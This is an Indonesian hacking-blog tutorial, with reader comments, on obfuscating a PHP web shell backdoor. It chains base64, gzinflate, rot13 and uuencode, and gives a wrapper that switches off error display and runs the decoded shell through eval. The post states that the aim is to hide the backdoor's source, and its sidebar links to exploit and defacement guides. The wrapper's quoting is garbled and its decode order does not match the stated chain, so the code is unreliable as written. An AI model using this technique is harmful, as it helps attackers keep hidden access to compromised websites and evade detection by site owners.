• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

[Tutorial] Cara Mudah Encode Shell Backdoor

May 20, 2013 by Jack Wilder 20 Comments

Kali ini saya akan share tutorial encode shell php. Ya, shell yang diencode memiliki banyak keunggulan. Selain kita menyembunyikan source asli dari shell tersebut, kita juga memperkecil ukuran dari shell.
Sekedar info, saya mendapatkan tutorial ini dari bang x’1n73ct . Dan di juga sudah mengijinkan jika tutorial ini disebarluaskan. πŸ™‚
Oke langsung saja.

Bahan :
Shell mentah
Tools Encode – klik Disini

Pertama-tama, siapkan shell yang akan di encode. Copy semua script dari atas sampai bawah. πŸ™‚
Lalu buka tools encode, pastekan scriptnya di kolom atas. Pilih jalur encodenya, sebagai contoh, saya pilih jalur : bsae64 – gzinflate – str_rot13 –convert_uu – gzinflate – base64 . Lalu klik menu encode.
Lihat SS :

Lalu hasil encode nantinya akan terlihat di kolom bawah.

Setelah itu, buka text editor [saya menggunakan notepad++], lalu copy script berikut :

<?php
@ini_set(‘output_buffering’,0); 
@ini_set(‘display_errors’, 0);

$convert = β€œ [shell yang diencode]  β€;

@eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($convert))))));

?>

Untuk [shell yang diencode], silahkan diisi dengan script hasil convert dari tools encode tadi.
Lalu tulisan yang saya beri warna biru, itu silahkan diisi sesuaid engan jalur encode yang dipilih.

Saya akan sedikit nejelaskan masing-masing fungsi script tersebut :

@ini_set(‘output_buffering’,0); 
Perintah ini berfungsi untuk meminimalkan buffering yang ada di file

@ini_set(‘display_errors’, 0);
Perintah ini berfungsi untuk menghilangkan error pada file

Dan setelah semua selesai, simpan dengan format .php . Contoh : shell.php
Coba test di localhost dan insya allah berhasil.
Shell JKT48 HACKER pun saya rilis setelah membaca tutorial ini.

Jika tutorial saya masih kurang, sobat bisa membaca tutorial dari bang x’1n73ct . Filenya berbentuk doc [dokumen].
Klik Disini Untuk Download

Di dalam file tersebut sudah ada tutorial encode shell dan juga tools encode yang bisa dijalankan di localhost.

Sekian tutorial dari saya. Semoga bermanfaat.
Special thanks to x’1n73ct


Yang mau copas harap kasih sumber ya. πŸ™‚

Shares

Filed Under: Uncategorized Tagged With: Hacking, Tips Dan Trik

Reader Interactions

Comments

  1. BlogS of Hariyanto says

    May 21, 2013 at 12:09 am

    pagi-pagi enaknya ngopi bareng sobat πŸ™‚

    Reply
    • chiaki says

      May 21, 2013 at 11:13 pm

      Kopinya sudah habis. πŸ˜€

      Reply
  2. Djangkaru Bumi says

    May 21, 2013 at 12:45 am

    Sambil mempraktekan biar lebih paham tentang encode shell.

    Reply
    • chiaki says

      May 21, 2013 at 11:14 pm

      Sip. (y)

      Reply
  3. Anonim says

    May 21, 2013 at 3:23 am

    ane kok gagal gan? πŸ™

    Reply
  4. Abed Saragih says

    May 21, 2013 at 7:38 am

    Memperhatikan saja ini sob,gpp kan πŸ™‚

    Reply
  5. Mas Nady says

    May 21, 2013 at 7:54 am

    apaan lagi nih sob. hehehehe seperti biasa dech sob, karna saya belum paham dengan postingan tentang beginian, saya suport saja sobat.. silaturahim aja ya.?

    Reply
  6. Anonim says

    May 21, 2013 at 1:55 pm

    Today, while I was at work, my sister stole my iphone and tested to see if it can survive a forty foot drop, just so she can
    be a youtube sensation. My apple ipad is now destroyed and she has
    83 views. I know this is totally off topic but I had
    to share it with someone!

    My blog post: reportajes de boda

    Reply
  7. Bung Penho says

    May 21, 2013 at 3:18 pm

    bisa kasih masukan gak neh sob?
    menurut saya kalo boleh sebelum menambahkan metode seperti encode shell ini, artikel awal kasih dikit penjelasan tentang apa maksud dan tujuan dari encode shell ini, digunakan pada jenis apa, terus baru masuk metode pembahasan cara menggunakannya. jadi lebih mudah memahaminya.
    sorry nih, sekedar saran aja bro

    Reply
    • chiaki says

      May 21, 2013 at 11:13 pm

      Itu diatas bukan nya udah ya. Tujuan nya untuk memperkecil ukuran shell. πŸ™‚

      kalo backdoor shell ya bentuk .php lah, :3

      Reply
  8. Muroi El-Barezy says

    May 22, 2013 at 3:53 am

    bisa sob, silaturahim disini, sambil belajar Encode Shell Backdoor

    Reply
  9. cak oni says

    May 22, 2013 at 7:17 am

    barcode , keren nih kang

    Reply
  10. Anonim says

    July 9, 2013 at 8:43 am

    kalo cara decode gimana bos ?

    Reply
  11. Anonim says

    July 13, 2013 at 2:54 pm

    Makasih ya, bermanfaat tutorialnya untuk saya.. Apalagi saya masih newbie.. hehehe :v

    Reply
  12. afreeadi says

    August 3, 2013 at 11:57 am

    Madura cyber ada forumx ng gan ? ? ?

    Reply
  13. Anonim says

    September 22, 2013 at 6:38 am

    Oy gw Kok Blank

    Reply
  14. Anonim says

    December 11, 2013 at 6:52 pm

    Gan q mala
    Parse error: syntax error, unexpected '?' in /home/cyberfun/public_html/a.php on line 5

    Reply
  15. NotiL CongoX says

    February 24, 2014 at 10:59 am

    nabilaholic-portal.tk/tools/encode.php <~ forbiden pak πŸ™

    Reply
  16. Hendra Yadi says

    August 6, 2015 at 2:22 am

    Peluang Bisnis Dahsyat Yusuf Mansur. "Orang islam harus KAYA"
    dan "Beli Kembali Aset Indonesia" dengan INDONESIA BERJAMAAH
    Segera Amankan Posisi Anda, Segera JOIN bersama
    Komunitas Paytren , bisnis terbaru Ustadz Yusuf Mansur
    Dengan Produk V-pay ( Virtual Payment ) Anda akan
    dimudahkan dalam hal urusan pembayaran listrik,
    telpon, pulsa, PDAM, TV Berbayar, Internet, cukup dari genggaman anda saja . Transaksi dapat dilakukan
    melalui Website, SMS, Android, BlackBerry, iPhone dan YM dan anda mendapatkan casback disetiap transaksi anda dan mitra di jaringan anda.
    Penasaran Dengan Bisnis
    Ustd. Yusuf Mansur ini Kunjungi Website: http://suksespaytren.com/wan-vsi

    Reply
  17. wk says

    October 3, 2020 at 9:31 am

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

DNS Hijacking through Social Engineering

WordPress Army Knife CSRF File Upload Vulnerability

Azure Traffic Manager Custom Domain or Subdomain Takeover

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Uptimerobot.com Custom Domain or Subdomain Takeover

Open Redirect Bypass Cheat Sheet

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

Exploit WPStore Themes Upload Vulnerability

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

LinuxSec / 67 queries in 0.10 seconds